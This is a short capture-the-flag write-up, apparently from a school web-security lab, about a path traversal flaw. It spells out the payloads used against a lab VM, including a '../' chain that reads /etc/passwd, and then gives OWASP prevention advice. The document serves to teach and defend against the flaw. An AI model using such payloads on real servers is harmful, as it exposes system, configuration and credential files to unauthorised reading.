# PATH TRAVERSAL

## Explanation

I found the vulnerability "path traversal" on OWASP website.

In the examples provided :
- "http://some_site.com.br/some-page.asp?page=index.html" is said vulnerable to the following url vulnerability
  - => "http://some_site.com.br/some-page.asp?page=../../../../dir/file"

It's very similar to the system used in darkly's website to navigate between pages
- => "http://VM_IP/?page=pagename"

I tried
- "http://VM_IP/?page=../../../"
  - => error message is `"Nope..."`
- "http://VM_IP/?page=../../../../../../../../../../../../../../"
  - => error message is `"You can DO it !!!  :]"`

Understood that I had to input a specific file instead of a directory
OWASP explicitely says to try for the /etc/passwd file

- "http://VM_IP/?page=../../../../../../../etc/passwd"
  - => Got the flag

## Exploitation

> This attack is for the attacker to access arbitrary files and directories stored on file system including :
>  - application source code
>  - configuration files
>  - critical system files

The attacker could then use these pieces of information to penetrate the system further for example.

## Prevention

> - Don’t store sensitive configuration files inside the web root
> - Prefer working without user input when using file system calls
> - Ensure the user cannot supply all parts of the path – surround it with your path code

## Documentation

[OWASP - path traversal](https://owasp.org/www-community/attacks/Path_Traversal)